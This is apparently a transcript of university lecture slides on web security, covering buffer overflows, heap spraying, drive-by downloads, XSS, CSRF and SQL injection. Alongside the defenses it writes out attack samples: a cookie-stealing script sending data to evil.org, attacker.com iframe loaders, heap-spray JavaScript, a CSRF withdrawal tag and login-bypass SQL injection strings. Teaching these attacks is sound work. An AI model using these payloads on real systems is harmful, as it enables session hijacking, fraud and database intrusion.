Web Security - PowerPoint PPT Presentation

Title: Web Security

Description: Web Security. Dr., Department of Computer Science and Information Engineering, National Central University. 81 slides.

Transcript and Presenter's Notes

1
  • Web Security
  • Dr. ? ? ?
  • Department of Computer Science and Information
    Engineering,National Central University

2
  • Stack Smashing Attacks

3
Principle of Stack Smashing Attacks
  • Overwrite control-transfer data, such as a return
    address or a function pointer, to redirect the
    program's execution flow to code of the attacker's
    choosing.
  • The attack string carries both the code and the
    address(es) of the code's entry point.

4
A Linux Process Layout and Stack Operations
  (figure) Process address space from high to low address:
  kernel address space; env, argv, argc; the stack, holding
  the frames of main, then G, then H, and growing toward low
  addresses; then libraries, heap, BSS, data and code.
  Call chain shown: main() calls G(1) (void G(int a)), which
  calls H(3) (void H(int c)).
5
Explanation of BOAs (1)
  • Code in the figure (H copies its input into a 100-byte
    stack buffer with no bound check):
      void G(int a) { H(3); /* add_g: the return address of this call */ }
      void H(int b) { char c[100]; int i = 0;
                      while ((c[i++] = getch()) != EOF); }
  (figure) Stack, high to low address: G's stack frame; the
  argument b; the return address (add_g); the saved address
  of G's frame pointer (ebp points here); then H's stack
  frame: c[99] down to c[0], then i (esp points here). With
  the input string "abc", c[0..2] hold 'a', 'b', 'c' at the
  sample addresses 0xaba, 0xabb, 0xabc.
6
Explanation of BOAs (2)
  • Attack string (length 108 bytes = 100 bytes of c[] + 4
    bytes of saved frame pointer + 4 bytes of return address):
      x x [Injected Code] x ... x y
    where x is a 1-byte filler and y is the 4-byte value
    0xabc.
  • Same code as on the previous slide.
  (figure) Stack after the copy loop, high to low address:
  the argument b; the return address slot, which held add_g
  and now holds 0xabc (y); the saved address of G's frame
  pointer (ebp), overwritten with filler; H's stack frame:
  c[99] down to c[0], filled with filler x, the injected
  code starting at c[2] (address 0xabc), and x x in c[0..1]
  (0xaba, 0xabb); then i (esp). When H returns, execution
  continues at 0xabc, inside the injected code.
7
Injected Code
  • The attacked programs usually run with root
    privilege; therefore the injected code is
    executed with root privilege.
  • The injected code is already in machine
    instruction form; therefore the CPU can execute
    it directly.
  • However, this also means that the injected
    code must match the CPU type of the attacked
    host.
  • Usually the injected code forks a shell;
    hence, after a successful attack, the attacker
    has a root shell.

8
  • Heap Spray and Drive-by Download

9
Heap Spray [Wikipedia][Nozzle]
  • Heap spraying is a technique used in exploits to
    facilitate arbitrary code execution.
  • It is a strategy of allocating many objects
    containing the attacker's exploit code in an
    application's heap.
  • Heap spraying still requires a separate memory
    corruption bug to trigger the attack, but the act
    of spraying greatly simplifies the attack and
    increases its likelihood of success.

10
Heap Spray Overview [Puttaraksa] (figure)
11
Implementation - JavaScript
  • Heap sprays for web browsers are commonly
    implemented in JavaScript.
  • They spray the heap by making copies of a long
    string and storing these strings in an array, up
    to the point where enough memory has been sprayed
    to cover the area that the exploit targets.
  • P.S. The long string begins with a NOP sled and
    ends with shellcode.

12
Implementation - ActionScript
  • ActionScript
  • In July 2009, exploits were found to be using
    ActionScript to spray the heap in Adobe Flash.

13
Implementation - Images
  • Images
  • Though it has been proven that heap-spraying can
    be done through other means, for instance by
    loading image files into the process, this has
    not seen widespread use (as of August 2008).

14
  • Memory Corruption Exploit

15
Sources of Memory Corruption Exploit
  • Mishandling Tag Attribute Values
  • Virtual Table

16
Mishandling Tag Attribute Values (1)
  • HTTP MS IE Malf. IFRAME/EMBED BO [Symantec]
    (Symantec's name for the Internet Explorer
    malformed IFRAME/EMBED buffer overflow)
  • It is reported that an attacker can exploit this
    condition by creating a malicious Web page
    containing a malformed IFRAME, FRAME or EMBED
    tag.
  • Specifically, the attacker creates the IFRAME,
    FRAME or EMBED tag by specifying large string
    values for the 'SRC' and 'NAME' properties.
  • These values are copied into finite sized process
    buffers resulting in memory corruption.

17
Mishandling Tag Attribute Values (2) [Julam]
  • Trigger: an IFRAME whose SRC and NAME attributes
    are very long strings
      <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
      BBBBBBBBBBBBBBB
      BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
      BBBBBBB
      BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
      BBBBBBBB NAME=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
      CCCCCCCCCCCCCCCC
      CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
      CCCCC>
      </IFRAME>
  • Result
  • eip stops at address 0x769f682f

18
Mishandling Tag Attribute Values (3) [Julam]
  • Spraying the heap before the trigger:
      memory = new Array();
      for (i = 0; i < 700; i++)
        memory[i] = block + shellcode;

19
Virtual Table [Foster et al.]
  • The virtual table is a lookup table of functions
    used to resolve function calls in a dynamic/late
    binding manner.
  • Class objects and structures are often stored on
    the heap.
  • One field of a class object is a pointer to its
    virtual table, called the virtual-function table
    pointer (__vptr).

20
Virtual Table [Foster et al.] Overview
  (figure) Two adjacent heap objects, each laid out as
  __vptr followed by char a[100]; a write past the end
  of the first object's a[100] reaches the second
  object's __vptr.
21
Virtual Table [Ratanaworabhan et al.] Spraying
the Heap
  • <SCRIPT language="text/javascript">
      shellcode = unescape("%u4343%u4343...");
      oneblock = unescape("%u0D0D%u0D0D");
      var fullblock = oneblock;
      while (fullblock.length < 0x40000) {
        fullblock += fullblock;
      }
      sprayContainer = new Array();
      for (i = 0; i < 1000; i++) {
        sprayContainer[i] = fullblock + shellcode;
      }
    </SCRIPT>

  (figure) Each sprayed block: NOP sled followed by the
  shellcode.
22
Result
  • Because the sprayed heap area may be tens of MBs,
    the attacker no longer needs to know an exact
    address, so ASLR may not work as expected.

23
Drive-by Download Attacks [Wikipedia]
  • A download of spyware, a computer virus, or any
    other kind of malware that happens without the
    user's knowledge.
  • Drive-by downloads may happen by
  • visiting a website,
  • viewing an e-mail message,
  • or
  • clicking on a deceptive popup window.

24
Clicking on a Deceptive Popup Window
  • For instance, a user clicks on the window in the
    mistaken belief
  • that it is an error report from his own PC
  • or
  • that it is an innocuous advertisement popup.
  • In such cases, the "supplier" may claim that the
    user "consented" to the download though he was
    completely unaware of having initiated a
    malicious software download.

25
Drive-by Downloads using Web Pages
  • Features
  • Same appearance as the original webpage
  • Secret downloads
  • Automatic installation
  • Based on vulnerabilities of browsers, plug-ins,
    or OSes

26
Client side
  (figure) WWW: a vulnerable browser (client side) loads a
  page from the good web server; the page has been modified
  to pull bad.htm and bad.js from the malicious web server
  attacker.com:
    <iframe src=http://attacker.com/bad.htm height=0 width=0> </iframe>
    <script src=http://attacker.com/bad.js></script>
27
Client side
  (figure) Same setup: bad.htm, served by attacker.com,
  carries an obfuscated loader that writes a further script,
  which in turn refers to attacker2.com:
    document.write(unescape("3C736372697074206C616E67756167653D226A617661736372
    697074223E0D0A6966286E6176696761746F722E757365724167656E742E746F4C
    6F7765724361736528292E696E6465784F6628225C7836445C7837335C78
  Read as hex byte pairs, the string decodes to
    <script language="javascript">
    if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73\x
  and is cut off there on the slide.
28
Discuss
  • Why not inject shell code at the first stage?
    (i.e. inject shell code to the good web server
    directly)

29
Drive-by Downloads
  • Why drive-by downloads?
  • Deploy malware on victims' computers
  • Large scale (vs. targeted attacks)
  • Bypass firewalls or NAT protection (the victim's
    browser makes the outbound connection)
  • Current solutions
  • Static web-page analysis
  • Web-site reputation
  • Microsoft kill bit (blocking an ActiveX control
    by its CLSID)

30
  • HTTP Cookie [Wikipedia]

31
HTTP Cookies
  • HTTP cookies, sometimes known as web cookies or
    just cookies, are parcels of text sent by a
    server to a web browser and then sent back
    unchanged by the browser each time it accesses
    that server.
  • HTTP cookies are used for
  • authenticating,
  • tracking,
  • maintaining specific information about users,
    such as site preferences or the contents of
    their electronic shopping carts.
  • The term "cookie" is derived from "magic cookie,"
    a well-known concept in Unix computing which
    inspired both the idea and the name of HTTP
    cookies.

32
Cookie Delivery
33
Examine the Cookies
  • Most browsers supporting JavaScript allow the
    user to see the cookies that are active with
    respect to a given page by typing
      javascript:alert("Cookies: " + document.cookie)
    in the browser URL field.
  • Some browsers incorporate a cookie manager for
    the user to see and selectively delete the
    cookies currently stored in the browser.

34
Third-party Cookies
  • Cookies are only sent back to the server that
    set them, or to one in the same Internet domain.
  • A web page may, however, contain images or other
    components stored on servers in other domains.
  • Cookies that are set during retrieval of these
    components are called third-party cookies.

35
Using Third-party Cookies to Track a Users
Activity
  • Advertising companies use third-party cookies to
    track a user across multiple sites.
  • In particular, an advertising company can track a
    user across all pages where it has placed
    advertising images or Web bugs.
  • Knowledge of the pages visited by a user allows
    the advertisement company to target advertisement
    to the user's presumed preferences.

36
Tracking Example
37
Privacy Threat
  • The possibility of building a profile of users
    has been considered by some a potential privacy
    threat,
  • even when the tracking is done on a single domain
  • but especially when tracking is done across
    multiple domains using third-party cookies.
  • For the above reason, some countries have
    legislation about cookies.

38
  • Cross-site Scripting

39
Categories
  • Non-persistent XSS (reflected XSS)
  • the most common type nowadays
  • Persistent XSS (stored XSS)

40
  • Non-persistent XSS

41
Through Hyperlinks
  • An attacker may be able to embed their malicious
    code within a hyperlink to the target site. When
    the client web browser follows the link, the URL
    sent to trusted.org includes the malicious code.
    The site (trusted.org) sends a page back to the
    browser including the value of criteria without
    validating the user-supplied input, which
    consequently forces the execution of code from
    the attacker's server, evil.org.
  • For example
      <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>
  • In the attack above, one source is inserting code
    into pages sent by another source.
  • It should be noted that this attack disguises
    the link as a link to http://trusted.org, can
    be easily included in an HTML email message, and
    does not supply the malicious code inline: it is
    downloaded from http://evil.org. Thus the attacker
    retains control of the script and can update or
    remove the exploit code at any time.
  (figure) Web browser and trusted.org exchanging the
  request and the reflected page.
42
Ways to Deploy Hyperlinks
  • The user will most likely click on this link from
  • another website,
  • instant message,
  • or
  • simply just reading a web board or email message.

43
Non-persistent Cross Site Scripting (XSS)
  • A non-persistent cross-site scripting (XSS)
    vulnerability is caused by the failure of a web
    based application to validate user-supplied input
    before returning it to the client system.
  • By causing the victim's browser to execute
    injected code under the same permissions as the
    web application's domain, an attacker can bypass
    the traditional Document Object Model (DOM)
    security restrictions, which can result in
  • cookie theft,
  • account hijacking,
  • changing of web application account settings,
  • spreading of a webmail virus, etc.

44
The Most Common Victims to Non-persistent XSS
  • The most common web components that fall victim
    to XSS vulnerabilities include
  • CGI scripts,
  • search engines,
  • interactive bulletin boards,
  • and
  • custom error pages with poorly written input
    validation routines.
  • Additionally, a victim doesnt necessarily have
    to click on a link XSS code can also be made to
    load automatically in an HTML e-mail with certain
    manipulations of the IMG or IFRAME HTML tags.

Each of these components could generate a web
page.
45
Hijack Web Application Sessions
  • The most popular XSS attack (and devastating) is
    the harvesting of
  • authentication cookies
  • and
  • session management tokens.
  • With this information, it is often a trivial
    exercise for an attacker to hijack the victims
    active session, completely bypassing the
    authentication process.

46
Traditional Non-persistent XSS Web Application
Hijack Scenario (1)
  • The attacker investigates an interesting site
  • that normal users must authenticate to gain
    access to
  • and
  • that tracks the authenticated user through the
    use of cookies or session IDs
  • The attacker finds a XSS vulnerable page on the
    site, for instance
    http//trusted.org/account.asp.
  • Using a little social engineering,
  • the attacker creates a special link to the site
  • and
  • embeds it in an HTML email that he sends to a
    long list of potential victims.

47
Traditional Non-persistent XSS Web Application
Hijack Scenario (2)
  • Embedded within the special link are some coding
    elements specially designed to transmit a copy of
    the victim's cookie back to the attacker. For
    instance
      <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?' + document.cookie)</script>">
  • Unknown to the victim, the attacker has now
    received a copy of their cookie information.
  • The attacker now visits the web site and, by
    substituting his cookie information with the
    victim's, is now perceived to be the victim by
    the server application.

48
Traditional Non-persistent XSS Web Application
Hijack Steps David Endler
49
  • SOLUTIONS AND WORKAROUNDS [David Endler]

50
For Users
  • As a web application user, there are a few ways
    to protect yourself from XSS attacks.
  • The first and most effective solution is to
    disable all scripting language support in your
    browser and email reader.
  • If this is not a feasible option for business
    reasons, another recommendation is to use
    reasonable caution when clicking links in
    anonymous e-mails and dubious web pages.

51
Web Application Developers and Vendors
  • Web application developers and vendors should
    ensure that all user input is parsed and filtered
    properly.
  • User input includes
  • things stored in GET Query strings,
  • POST data,
  • Cookies,
  • URLs,
  • and
  • in general any persistent data that is
    transmitted between the browser and web server.

52
User Input Filtering
  • The best philosophy to follow regarding user
    input filtering is to deny all but a pre-selected
    set of benign characters in the web input stream.
  • This saves developers from having to constantly
    predict and update all forms of malicious input
    in order to deny only specific characters (such
    as < and ?).
  • Some decent guidelines for input filtering can be
    found in the OWASP requirements document "OWASP
    Guide to Building Secure Web Applications and Web
    Services".

53
Test
  • Once an application has evolved out of the design
    and development phases, it is important to
    periodically test for XSS vulnerabilities since
    application functionality is constantly changing
    due to
  • upgrades
  • integration of third party technologies
  • decentralized website authoring

54
Vulnerability Web Application Scanners
  • Many web application vulnerability scanners have
    started to include checks for XSS.
  • The OWASP Testing group plans to produce a
    methodology for checking XSS on a web
    application.
  • WebScarab

55
Examples Used to Bypass Being Detected
  • XSS Cheat Sheet

56
XSS Tool
  • XSS-Proxy

57
  • Cross-site Request Forgery [Wikipedia]

58
Definition
  • Cross-site request forgery, also known as
    one-click attack or session riding and
    abbreviated as CSRF ("sea-surf") or XSRF, is a
    type of malicious exploit of a website whereby
    unauthorized commands are transmitted from a user
    that the website trusts.

59
Background
  • CSRF vulnerabilities have been known and in some
    cases exploited since the 1990s.
  • Because it is carried out from the user's IP
    address, CSRF is untraceable without proper
    logging.

60
Impact
  • As of 2007 there are few well-documented
    examples.
  • About 18 million users of eBay's Internet Auction
    Co. at Auction.co.kr in Korea lost personal
    information in February 2008.
  • Customers of a bank in Mexico were attacked in
    early 2008 with an image tag in email.

61
Example
  • One user, Bob, might be browsing a chat forum
    where another user, Mallory, has posted a
    message.
  • Suppose that Mallory has crafted an HTML image
    element that references a script on Bob's bank's
    website (rather than an image file), e.g.,
      <img src="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">
  • If Bob's bank keeps his authentication
    information in a cookie, and if the cookie hasn't
    expired, then the attempt by Bob's browser to
    load the image will submit the withdrawal request
    with his cookie, thus authorizing a transaction
    without Bob's approval.

62
Common CSRF Characteristics
  • Involve sites that rely on a user's identity
  • Exploit the site's trust in that identity
  • Trick the user's browser into sending HTTP
    requests to a target site
  • Involve HTTP requests that have side effects

63
Common CSRF Victims
  • At risk are web applications that perform actions
    based on input from trusted and authenticated
    users without requiring the user to authorize the
    specific action.
  • A user that is authenticated by a cookie saved in
    his web browser could unknowingly send an HTTP
    request to a site that trusts him and thereby
    cause an unwanted action.

64
Common CSRF Pitfalls
  • CSRF attacks using images are often made from
    Internet forums, where users are allowed to post
    images but not JavaScript.

65
CSRF Assumptions
  • This attack relies on a few assumptions
  • The attacker has knowledge of sites on which the
    victim has current authentication (more common on
    web forums, where this attack is most common)
  • The attacker's "target site" has authentication
    cookies, or the victim has a current session
    cookie with the target site
  • The "target site" doesn't have secondary
    authentication for actions (such as form tokens)

66
Example (same-origin policy and document.domain)
  • Assume a script in the document at
    http://store.company.com/dir/other.html
    executes the following statement
      document.domain = "company.com";
  • After that statement executes, the page would
    pass the origin check with
    http://company.com/dir/page.html.
  • However, by the same reasoning, company.com could
    not set document.domain to othercompany.com.

67
Prevention
  • For the web site, switching from a persistent
    authentication method (e.g. a cookie or HTTP
    authentication) to a transient authentication
    method (e.g. a hidden field provided on every
    form) will help prevent these attacks.
  • A similar approach is to include a secret,
    user-specific token in forms that is verified in
    addition to the cookie.
  (figure callouts: "hidden field of a form" and
  "a field of a form filled out by a user")

68
  • SQL Injection [SK]

69
What is SQL Injection?
  • Many web pages take parameters from web users
    and make SQL queries to the database.
  • Take for instance a user logging in to a web page:
    the web page accepts the user name and password
    and makes an SQL query to the database to check
    whether the user has a valid name and password.
  • With SQL injection, it is possible for us to send
    a crafted user name and/or password field that
    changes the SQL query and thus grants us
    something else.

70
SQL Injection Attack Channels
  • SQL injection is a type of web hacking that
    requires nothing but port 80, and it may well
    work even if the admin is patch-happy.
  • It attacks the web application (ASP, JSP, PHP,
    CGI, etc.) itself rather than the web server or
    services running in the OS.

71
What Should You Look for?
  • Try to look for pages that allow you to submit
    data, i.e.
  • login page,
  • search page,
  • feedback, etc.
  • Sometimes, HTML pages use the POST method to send
    parameters to another ASP page. Therefore, you
    may not see the parameters in the URL. However,
    you can check the source code of the HTML and
    look for the "FORM" tag. You may find something
    like this:
      <FORM action=Search/search.asp method=post>
        <input type=hidden name=A value=C>
      </FORM>
    Everything between the <FORM> and </FORM> has
    potential parameters that might be useful
    (exploit-wise).

72
What If You Can't Find Any Page That Takes Input?
  • You should look for pages like ASP, JSP, CGI, or
    PHP web pages.
  • Try especially to look for URLs that take
    parameters, like http://duck/index.asp?id=10

73
How Do You Test If It Is Vulnerable?
  • Start with the single quote trick. Input something
    like
      hi' or 1=1--
    into the login field, the password field, or even
    the URL.
  • Example
      Login: hi' or 1=1--
      Pass:  hi' or 1=1--
      http://duck/index.asp?id=hi' or 1=1--
  • If luck is on your side, you will get logged in
    without any login name or password.

74
Hidden Field
  • If you must do this with a hidden field, just
    download the HTML source from the site, save it
    on your hard disk, and modify the URL and hidden
    field accordingly.
  • Example
      <FORM action=http://duck/Search/search.asp method=post>
        <input type=hidden name=A value="hi' or 1=1--">
      </FORM>

75
Database Table Example [CQU]
76
Database Table: product
  PName      PCategory   price  number  bar code
  bread      food          30     100   100-234-7
  cake       food         300      20   100-987-6
  cookie     food          50      70   100-812-9
  model car  toy          200      20   300-567-7
  figure     toy          300      80   300-987-9
  paper      stationery     0.5  5000   981-897-7
  pen        stationery    20     300   981-967-0
77
Web Application Input and Its Corresponding SQL
Query
  • Take an ASP page that links you to another page
    with the following URL:
      http://duck/index.asp?category=food
    In the URL, 'category' is the variable name and
    'food' is the value assigned to the variable. To
    handle it, the ASP page might contain the
    following code:
      v_cat = request("category")
      sqlstr = "SELECT * FROM product WHERE PCategory='" & v_cat & "'"
      set rs = conn.execute(sqlstr)
  • As we can see, our value is wrapped into v_cat and
    thus the SQL statement becomes
      SELECT * FROM product WHERE PCategory='food'
    The query should return a result set containing
    one or more rows that match the WHERE condition,
    in this case, 'food'.

78
Why ' or 1=1-- ?
  • Now, assume that we change the URL into something
    like this:
      http://duck/index.asp?category=food' or 1=1--
    Now our variable v_cat equals "food' or 1=1-- ";
    if we substitute this into the SQL query, we have
      SELECT * FROM product WHERE PCategory='food' or 1=1--'
    The query now selects everything from the product
    table regardless of whether PCategory is equal to
    'food' or not.
  • A double dash "--" tells MS SQL Server to ignore
    the rest of the query, which gets rid of the last
    hanging single quote (').
  • Sometimes it may be possible to replace the double
    dash with a single hash "#".

79
Other Crafted Input (1)
  • However, if it is not SQL Server, or you simply
    cannot ignore the rest of the query, you may also
    try
      ' or 'a'='a
    The SQL query will now become
      SELECT * FROM product WHERE PCategory='food' or 'a'='a'
    It should return the same result.

80
Other Crafted Input (2)
  • Depending on the actual SQL query, you may have
    to try some of these possibilities:
      ' or 1=1--
      " or 1=1--
      or 1=1--
      ' or 'a'='a
      " or "a"="a
      ') or ('a'='a